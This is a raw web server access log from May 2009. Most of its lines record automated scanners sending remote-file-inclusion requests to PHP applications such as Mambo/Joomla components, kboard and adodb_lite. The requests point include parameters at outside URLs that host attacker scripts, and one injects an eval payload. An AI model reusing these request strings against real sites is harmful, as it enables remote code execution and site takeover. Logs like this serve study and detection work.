88.191.103.144 - - [26/May/2009:13:10:05 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://opall.fr//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.825"
88.191.103.144 - - [26/May/2009:13:10:05 -0500] "GET //skin/zero_vote/error.php?dir=http://opall.fr//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.825"
218.185.20.88 - - [26/May/2009:13:12:42 -0500] "GET /logs/access_log.1238457600//paypalcart.php?toroot=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:13:12:42 -0500] "GET /logs/access_log.1240876800//paypalcart.php?toroot=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:13:12:42 -0500] "GET //paypalcart.php?toroot=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:13:12:42 -0500] "GET /logs//paypalcart.php?toroot=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:13:12:58 -0500] "GET /logs/access_log.1241308800//paypalcart.php?toroot=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:13:13:10 -0500] "GET /logs/access_log.1240012800//paypalcart.php?toroot=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
213.246.62.35 - - [26/May/2009:13:13:32 -0500] "GET /logs/access_log.1240531200/index.php?visualizar=http://jamur.3dn.ru/id1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
213.246.62.35 - - [26/May/2009:13:13:32 -0500] "GET /logs/access_log.1241308800/index.php?visualizar=http://jamur.3dn.ru/id1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
88.191.103.144 - - [26/May/2009:13:14:48 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://opall.fr//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.825"
88.191.103.144 - - [26/May/2009:13:14:48 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://opall.fr//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.825"
218.185.20.88 - - [26/May/2009:13:17:59 -0500] "GET /logs/access_log.1240531200//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:13:17:59 -0500] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:13:17:59 -0500] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:13:18:09 -0500] "GET /logs/access_log.1242086400//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
83.143.81.26 - - [26/May/2009:13:18:18 -0500] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
83.143.81.26 - - [26/May/2009:13:18:18 -0500] "GET /logs/access_log.1235001600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
83.143.81.26 - - [26/May/2009:13:18:18 -0500] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
83.143.81.26 - - [26/May/2009:13:18:18 -0500] "GET /logs/access_log.1232064000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
85.17.162.28 - - [26/May/2009:13:18:31 -0500] "GET /logs/access_log.1232064000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
85.17.162.28 - - [26/May/2009:13:18:31 -0500] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
85.17.162.28 - - [26/May/2009:13:18:31 -0500] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
85.17.162.28 - - [26/May/2009:13:18:36 -0500] "GET /logs/access_log.1235001600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
78.40.224.155 - - [26/May/2009:13:19:24 -0500] "GET /e404.php?DOCUMENT_ROOT=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
78.40.224.155 - - [26/May/2009:13:19:24 -0500] "GET /logs/access_log.1239667200/e404.php?DOCUMENT_ROOT=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
78.40.224.155 - - [26/May/2009:13:19:24 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
78.40.224.155 - - [26/May/2009:13:19:24 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:13:19:48 -0500] "GET /logs//paypalcart.php?toroot=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:13:19:48 -0500] "GET //paypalcart.php?toroot=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:13:19:48 -0500] "GET /logs/access_log.1240876800//paypalcart.php?toroot=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:13:19:48 -0500] "GET /logs/access_log.1238457600//paypalcart.php?toroot=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:13:20:03 -0500] "GET /logs/access_log.1241308800//paypalcart.php?toroot=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:13:20:08 -0500] "GET /logs/access_log.1240012800//paypalcart.php?toroot=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
78.40.224.155 - - [26/May/2009:13:22:23 -0500] "GET /e404.php?DOCUMENT_ROOT=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
78.40.224.155 - - [26/May/2009:13:22:23 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
78.40.224.155 - - [26/May/2009:13:22:23 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
78.40.224.155 - - [26/May/2009:13:22:23 -0500] "GET /logs/access_log.1239667200/e404.php?DOCUMENT_ROOT=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
78.40.224.155 - - [26/May/2009:13:23:18 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
78.40.224.155 - - [26/May/2009:13:23:18 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
78.40.224.155 - - [26/May/2009:13:23:18 -0500] "GET /logs/access_log.1237248000/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
66.219.99.129 - - [26/May/2009:13:24:07 -0500] "GET /logs/?sourcedir=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 200 190841 "-""libwww-perl/5.79"
78.40.224.155 - - [26/May/2009:13:24:10 -0500] "GET /logs/access_log.1236124800/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
66.219.99.129 - - [26/May/2009:13:24:12 -0500] "GET /?sourcedir=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
78.40.224.155 - - [26/May/2009:13:26:26 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
78.40.224.155 - - [26/May/2009:13:26:27 -0500] "GET /logs/access_log.1237248000/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
78.40.224.155 - - [26/May/2009:13:26:27 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
60.48.90.141 - - [26/May/2009:13:27:01 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
60.48.90.141 - - [26/May/2009:13:27:01 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
60.48.90.141 - - [26/May/2009:13:27:01 -0500] "GET /logs/access_log.1234828800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 383 "-""Mozilla/5.0"
89.187.131.185 - - [26/May/2009:13:27:13 -0500] "GET /logs/access_log.1242432000//?pagina=http://www.maca2002.com/IMAGES/id.txt%0D?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
89.187.131.185 - - [26/May/2009:13:27:13 -0500] "GET //?pagina=http://www.maca2002.com/IMAGES/id.txt%0D?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
60.48.90.141 - - [26/May/2009:13:27:13 -0500] "GET /logs/access_log.1234915200///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 383 "-""Mozilla/5.0"
89.187.131.185 - - [26/May/2009:13:27:14 -0500] "GET /logs//?pagina=http://www.maca2002.com/IMAGES/id.txt%0D?? HTTP/1.1" 200 190846 "-""libwww-perl/5.805"
89.108.64.88 - - [26/May/2009:13:27:17 -0500] "GET /logs//citywriter/head.php?path=http://www.ghetto.uz/readme.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
89.108.64.88 - - [26/May/2009:13:27:18 -0500] "GET //citywriter/head.php?path=http://www.ghetto.uz/readme.txt? HTTP/1.1" 404 303 "-""libwww-perl/5.812"
78.40.224.155 - - [26/May/2009:13:27:23 -0500] "GET /logs/access_log.1236124800/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
66.219.99.129 - - [26/May/2009:13:27:38 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
66.219.99.129 - - [26/May/2009:13:27:38 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
210.188.218.248 - - [26/May/2009:13:31:01 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
210.188.218.248 - - [26/May/2009:13:31:02 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
211.203.180.144 - - [26/May/2009:13:31:15 -0500] "GET /logs/access_log.1238889600/modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:13:33:08 -0500] "GET /logs/access_log.1240531200//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:13:33:08 -0500] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:13:33:08 -0500] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:13:33:20 -0500] "GET /logs/access_log.1242086400//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.219.99.129 - - [26/May/2009:13:36:30 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
66.219.99.129 - - [26/May/2009:13:36:30 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
78.40.224.155 - - [26/May/2009:13:37:10 -0500] "GET /logs/access_log.1241049600/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
222.239.227.229 - - [26/May/2009:13:37:17 -0500] "GET //?path%5Bdocroot%5D=http://www.dbmoptics.com/glossary/fx29id2.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
222.239.227.229 - - [26/May/2009:13:37:17 -0500] "GET /logs/access_log.1239408000//?path%5Bdocroot%5D=http://www.dbmoptics.com/glossary/fx29id2.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
222.239.227.229 - - [26/May/2009:13:37:19 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.dbmoptics.com/glossary/fx29id2.txt??? HTTP/1.1" 200 190846 "-""Mozilla/5.0"
222.239.227.229 - - [26/May/2009:13:37:26 -0500] "GET /logs/access_log.1242086400//?path%5Bdocroot%5D=http://www.dbmoptics.com/glossary/fx29id2.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
210.188.218.248 - - [26/May/2009:13:37:59 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
210.188.218.248 - - [26/May/2009:13:38:00 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
78.40.224.155 - - [26/May/2009:13:40:12 -0500] "GET /logs/access_log.1241049600/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
85.17.162.28 - - [26/May/2009:13:41:45 -0500] "GET /logs//vwar/convert/mvcw.php?step=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.17.162.28 - - [26/May/2009:13:41:45 -0500] "GET /logs/access_log.1233705600//vwar/convert/mvcw.php?step=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.17.162.28 - - [26/May/2009:13:41:46 -0500] "GET //vwar/convert/mvcw.php?step=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
85.17.162.28 - - [26/May/2009:13:41:46 -0500] "GET /logs/access_log.1236643200//vwar/convert/mvcw.php?step=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.17.162.28 - - [26/May/2009:13:42:16 -0500] "GET //vwar/convert/mvcw.php?step=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
85.17.162.28 - - [26/May/2009:13:42:16 -0500] "GET /logs//vwar/convert/mvcw.php?step=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.17.162.28 - - [26/May/2009:13:42:16 -0500] "GET /logs/access_log.1232755200//vwar/convert/mvcw.php?step=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.17.162.28 - - [26/May/2009:13:42:19 -0500] "GET /logs/access_log.1236038400//vwar/convert/mvcw.php?step=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
66.223.51.15 - - [26/May/2009:13:42:39 -0500] "GET //include/lib.inc.php?site_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
66.223.51.15 - - [26/May/2009:13:42:42 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
66.223.51.15 - - [26/May/2009:13:42:42 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
66.223.51.15 - - [26/May/2009:13:42:42 -0500] "GET /logs/access_log.1232150400//include/lib.inc.php?site_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
113.29.225.7 - - [26/May/2009:13:43:18 -0500] "GET /logs/access_log.1232755200//vwar/convert/mvcw.php?step=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
113.29.225.7 - - [26/May/2009:13:43:18 -0500] "GET /logs//vwar/convert/mvcw.php?step=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
113.29.225.7 - - [26/May/2009:13:43:18 -0500] "GET //vwar/convert/mvcw.php?step=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
113.29.225.7 - - [26/May/2009:13:43:18 -0500] "GET /logs/access_log.1233705600//vwar/convert/mvcw.php?step=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
72.30.87.106 - - [26/May/2009:13:44:32 -0500] "GET /robots.txt HTTP/1.0" 404 281 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.87.106 - - [26/May/2009:13:44:33 -0500] "GET /logs/access_log.1228694400 HTTP/1.0" 200 24780 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.146.68.61 - - [26/May/2009:13:45:33 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/id2.3.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
62.146.68.61 - - [26/May/2009:13:45:33 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/id2.3.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
62.146.68.61 - - [26/May/2009:13:45:33 -0500] "GET /logs/access_log.1237161600//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/id2.3.txt??? HTTP/1.1" 404 375 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
62.146.68.61 - - [26/May/2009:13:45:34 -0500] "GET /logs/access_log.1237507200//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/id2.3.txt??? HTTP/1.1" 404 375 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
216.17.99.13 - - [26/May/2009:13:45:52 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 317 "-""libwww-perl/5.826"
216.17.99.13 - - [26/May/2009:13:45:52 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 322 "-""libwww-perl/5.826"
207.182.143.50 - - [26/May/2009:13:48:12 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:13:48:12 -0500] "GET /logs/access_log.1240704000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:13:48:12 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:13:48:23 -0500] "GET /logs/access_log.1242432000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
196.40.83.75 - - [26/May/2009:13:49:55 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://opall.fr//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
196.40.83.75 - - [26/May/2009:13:49:55 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://opall.fr//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
196.40.83.75 - - [26/May/2009:13:50:06 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://opall.fr//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
196.40.83.75 - - [26/May/2009:13:50:06 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://opall.fr//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
88.191.103.144 - - [26/May/2009:13:50:26 -0500] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://opall.fr//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.825"
88.191.103.144 - - [26/May/2009:13:50:27 -0500] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://opall.fr//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.825"
196.40.83.75 - - [26/May/2009:13:50:28 -0500] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://opall.fr//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
196.40.83.75 - - [26/May/2009:13:50:28 -0500] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://opall.fr//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
202.124.245.42 - - [26/May/2009:13:51:04 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://opall.fr//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
202.124.245.42 - - [26/May/2009:13:51:04 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://opall.fr//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.182.143.50 - - [26/May/2009:13:51:05 -0500] "GET //?DOCUMENT_ROOT=http://208.98.22.241/id.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
207.182.143.50 - - [26/May/2009:13:51:06 -0500] "GET /logs//?DOCUMENT_ROOT=http://208.98.22.241/id.txt??? HTTP/1.1" 200 190846 "-""libwww-perl/5.805"
88.191.103.144 - - [26/May/2009:13:51:18 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://opall.fr//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.825"
88.191.103.144 - - [26/May/2009:13:51:19 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://opall.fr//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.825"
207.182.143.50 - - [26/May/2009:13:51:41 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:13:51:42 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:13:51:42 -0500] "GET /logs/access_log.1240704000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:13:51:52 -0500] "GET /logs/access_log.1242432000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
